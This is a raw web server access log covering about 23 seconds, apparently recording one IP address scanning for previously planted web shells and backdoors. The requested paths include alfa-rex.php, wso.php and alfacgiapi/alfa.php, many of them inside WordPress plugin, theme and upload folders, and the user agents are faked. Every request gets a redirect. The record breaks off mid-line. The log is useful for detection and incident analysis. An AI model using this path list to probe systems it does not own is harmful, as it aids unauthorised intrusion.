[15/Sep/2024:22:15:26 +0700] "GET /images/searchl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:15:26 +0700] "GET /languages/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:26 +0700] "GET /com_jea/views/form/tmpl/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:26 +0700] "GET /controller/extension/extension/Not_Found.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:27 +0700] "GET /plugins/envato-market/inc/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:27 +0700] "GET /includes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:15:27 +0700] "GET /pki-validation/user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:27 +0700] "GET /css/colors/modern/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:27 +0700] "GET /phpmailer/updates.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:28 +0700] "GET /fonts/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:28 +0700] "GET /uploads/hrtp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:28 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:15:28 +0700] "GET /includes/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:28 +0700] "GET /css/colors/coffee/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:29 +0700] "GET /class-IXR-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:29 +0700] "GET /SimplePie/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:29 +0700] "GET /pki-validation/xl2023.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:29 +0700] "GET /phpunit/phpunit/src/Util/PHP/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:29 +0700] "GET /plugins/gucdbuwrso/wp-editor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:30 +0700] "GET /wp-mail.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:15:30 +0700] "GET /plugin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:30 +0700] "GET /SimplePie/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:30 +0700] "GET /css/colors/blue/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:30 +0700] "GET /uploads/eorr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:31 +0700] "GET /maint/update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:31 +0700] "GET /plugins/seoo/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:31 +0700] "GET /themes/twentytwentytwo/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:31 +0700] "GET /themes/themes/Cyb3r.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:31 +0700] "GET /plugins/fix/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:32 +0700] "GET /customize/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:32 +0700] "GET /plugins/stats/instoll.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:32 +0700] "GET /informasi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:32 +0700] "GET /pomo/pomo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:15:32 +0700] "GET /random_compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:33 +0700] "GET /wp-content/plugins/xltavrat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:33 +0700] "GET /images/b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:33 +0700] "GET /random_compat/random-ajax-response.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:33 +0700] "GET /pki-validation/dbform.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:33 +0700] "GET /database.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:34 +0700] "GET /css/3e.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:34 +0700] "GET /maint/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:34 +0700] "GET /x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:34 +0700] "GET /plugins/ubh/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:34 +0700] "GET /uploads/Simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:35 +0700] "GET /network/mariju.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:35 +0700] "GET /plugins/fix/xxx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:35 +0700] "GET /css/dist/block-directory/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:35 +0700] "GET /js/tinymce/skins/wordpress/images/options-permalinks.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:35 +0700] "GET /plugins/apikey/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:36 +0700] "GET /js/js.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:36 +0700] "GET /customize/dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:36 +0700] "GET /areziohe.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:36 +0700] "GET /pki-validation/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:36 +0700] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:15:37 +0700] "GET /include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:37 +0700] "GET /option.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:37 +0700] "GET /plugins/random/init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:15:37 +0700] "GET /images/adminfuns.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:37 +0700] "GET /plugins/akismet/views/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:15:38 +0700] "GET /SimplePie/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:38 +0700] "GET /wp-content/uploads/Piens-ma.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:38 +0700] "GET /wp-configs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:38 +0700] "GET /options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:38 +0700] "GET /wp-add.php?a=c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:39 +0700] "GET /themes/fitnessbase/404.php?ok HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:39 +0700] "GET /pki-validation/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:39 +0700] "GET /includes/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:39 +0700] "GET /plugins/ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:39 +0700] "GET /goat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:15:40 +0700] "GET /admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:15:40 +0700] "GET /plugins/masterslider/inc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:40 +0700] "GET /upgrade/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:40 +0700] "GET /uploads/2023/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:40 +0700] "GET /class-wp-filesystem-base.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:41 +0700] "GET /uploads/2023/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:41 +0700] "GET /plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:41 +0700] "GET /images/file1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:41 +0700] "GET /images/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:42 +0700] "GET /Text/Diff/Engine/blurbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:42 +0700] "GET /wp-includes/IXR/allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:42 +0700] "GET /customize/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:42 +0700] "GET /js/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:42 +0700] "GET /access.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:43 +0700] "GET /css/colors/blue/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:43 +0700] "GET /images/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:43 +0700] "GET /lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:43 +0700] "GET /css/dist/nux/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:15:43 +0700] "GET /Requests/Auth/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:44 +0700] "GET /theme-compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:44 +0700] "GET /theme-compat/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:44 +0700] "GET /plugins/seoo/ulc2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:44 +0700] "GET /uploads/2023/07/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:15:44 +0700] "GET /acme-challenge/ajax-restore.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:15:45 +0700] "GET /includes/class-wp-filesystem-import.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:45 +0700] "GET /SimplePie/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:45 +0700] "GET /ms-media.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:45 +0700] "GET /css/searchq.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:45 +0700] "GET /uploads/2023/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:46 +0700] "GET /alfacgiapi/alfa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:15:46 +0700] "GET /ID3/wp-includes/ID3/getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:46 +0700] "GET /css/colors/ocean/lock0360.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:46 +0700] "GET /assets/mpvloi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:46 +0700] "GET /random_compat/random_bytes_cyclone.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:47 +0700] "GET /plugins/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:47 +0700] "GET /js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:47 +0700] "GET /jp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:47 +0700] "GET /plugins/ubh/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:15:47 +0700] "GET /images/wp-signup.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:48 +0700] "GET /plugins/wp-help/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:15:48 +0700] "GET /pki-validation/cuopbnal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:48 +0700] "GET /adminer.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:48 +0700] "GET /themes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:48 +0700] "GET /js/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:15:49 +0700] "GET /uplirtba.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:15:49 +0700] "GET /pki-validation/admin1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:49 +0700] "GET /addPhoto.php 